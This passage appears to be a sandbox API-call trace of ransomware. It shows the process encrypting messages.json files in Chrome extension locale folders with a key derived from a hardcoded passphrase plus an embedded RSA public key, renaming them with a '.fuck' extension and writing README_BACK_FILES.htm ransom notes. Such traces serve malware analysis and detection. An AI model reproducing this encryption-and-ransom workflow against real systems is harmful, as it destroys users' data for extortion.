"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.157] GetFileType (hFile=0x5d50) returned 0x1 [0258.157] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.159] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.159] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7ffc0 [0258.160] FindNextFileA (in: hFindFile=0x2e7ffc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.160] FindNextFileA (in: hFindFile=0x2e7ffc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.160] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.160] GetLastError () returned 0x0 [0258.160] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\messages.json")) returned 0x20 [0258.160] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json", dwFileAttributes=0x80) returned 1 [0258.161] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.161] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.162] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.163] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.167] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.167] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.167] CryptHashData (hHash=0x2e7fdc0, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.167] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fdc0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fd40) returned 1 [0258.167] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.167] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.167] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7a940) returned 1 [0258.168] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a940, dwCertEncodingType=0x1, pInfo=0x2e26210*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26240*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26248*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e80080) returned 1 [0258.168] CryptEncrypt (in: hKey=0x2e80080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.168] CryptEncrypt (in: hKey=0x2e80080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7a258*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7a258*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.168] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7a258*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7a258*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.169] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd2, lpOverlapped=0x0) returned 1 [0258.171] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0258.171] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0258.171] CloseHandle (hObject=0x5d5c) returned 1 [0258.171] CloseHandle (hObject=0x5d60) returned 1 [0258.171] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\messages.json"), bFailIfExists=0) returned 1 [0258.175] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json", dwFileAttributes=0x0) returned 1 [0258.175] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\messages.json.gsg")) returned 1 [0258.177] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\messages.json.fuck")) returned 1 [0258.178] CryptDestroyHash (hHash=0x2e7fdc0) returned 1 [0258.178] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0258.178] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.178] FindNextFileA (in: hFindFile=0x2e7ffc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.178] FindClose (in: hFindFile=0x2e7ffc0 | out: hFindFile=0x2e7ffc0) returned 1 [0258.178] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\readme_back_files.htm")) returned 0xffffffff [0258.178] AreFileApisANSI () returned 1 [0258.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0258.179] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_hk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.179] GetFileType (hFile=0x5d50) returned 0x1 [0258.180] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.181] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.181] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fbc0 [0258.181] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.181] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.181] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.181] GetLastError () returned 0x0 [0258.182] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\messages.json")) returned 0x20 [0258.182] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0258.182] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.183] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.198] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.199] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.201] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.201] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.201] CryptHashData (hHash=0x2e7fc80, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.201] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fc80, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ff00) returned 1 [0258.202] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.202] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.202] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7ab60) returned 1 [0258.202] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7ab60, dwCertEncodingType=0x1, pInfo=0x2e262e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26310*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26318*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7f9c0) returned 1 [0258.202] CryptEncrypt (in: hKey=0x2e7f9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.202] CryptEncrypt (in: hKey=0x2e7f9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7a1d0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7a1d0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.202] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e7a1d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7a1d0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.203] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xaa, lpOverlapped=0x0) returned 1 [0258.204] CryptEncrypt (in: hKey=0x2e7ff00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xaa, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0258.204] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0258.204] CloseHandle (hObject=0x5d60) returned 1 [0258.205] CloseHandle (hObject=0x5d5c) returned 1 [0258.205] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0258.208] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0258.208] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0258.210] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0258.211] CryptDestroyHash (hHash=0x2e7fc80) returned 1 [0258.211] CryptDestroyKey (hKey=0x2e7ff00) returned 1 [0258.212] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.212] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.212] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0258.212] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0258.212] AreFileApisANSI () returned 1 [0258.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0258.212] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.213] GetFileType (hFile=0x5d50) returned 0x1 [0258.213] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.215] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.215] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7ff00 [0258.215] FindNextFileA (in: hFindFile=0x2e7ff00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.215] FindNextFileA (in: hFindFile=0x2e7ff00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.216] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.216] GetLastError () returned 0x0 [0258.216] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json")) returned 0x20 [0258.216] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json", dwFileAttributes=0x80) returned 1 [0258.217] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.218] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, 